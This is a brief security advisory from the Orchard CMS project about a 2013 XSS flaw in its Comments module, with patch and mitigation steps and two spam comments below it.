Orchard Security Update

Background

On April 30, 2013 we released a security update for a discovered non-persistent XSS vulnerability targeting all versions of Orchard. For more information on this kind of vulnerability please read this http://en.wikipedia.org/wiki/Cross-site_scripting.

For the official announcement please read http://docs.orchardproject.net/Documentation/Patch-4-30-2013

Issue

The Comments module provided by default Orchard could in some circumstances let an external website render custom scripts on an Orchard website. As a matter of fact you should never click on buttons from untrusted websites. This vulnerability might ultimately be used to gather your credentials if you further authenticate on the targeted Orchard website.

Action required

Apply the patches provided for your version on the http://orchard.codeplex.com websites in the Downloads section, or update to Orchard 1.6.1.

Mitigation

  • If you don't use the Comments module in Orchard, you can simply disable it in the Modules section of the Dashboard.
  • If your theme doesn't render the Messages zone, you are also safe, even if the Comments module is activated.

2 Comments

  • top essay writing service said Reply

    I visit this blog first time and motivate by this well done work.I am really impressed with this blog. It is easy to see that you are passionate about your writing. If only I had your writing ability I look forward to more updates. Extraordinary post keeps up posting such incredible data.Great tips.Thanks for the ideas.

  • icloud unlock experts said Reply

    I am so intetrested about this because a friend recommneded this to me.

Add a Comment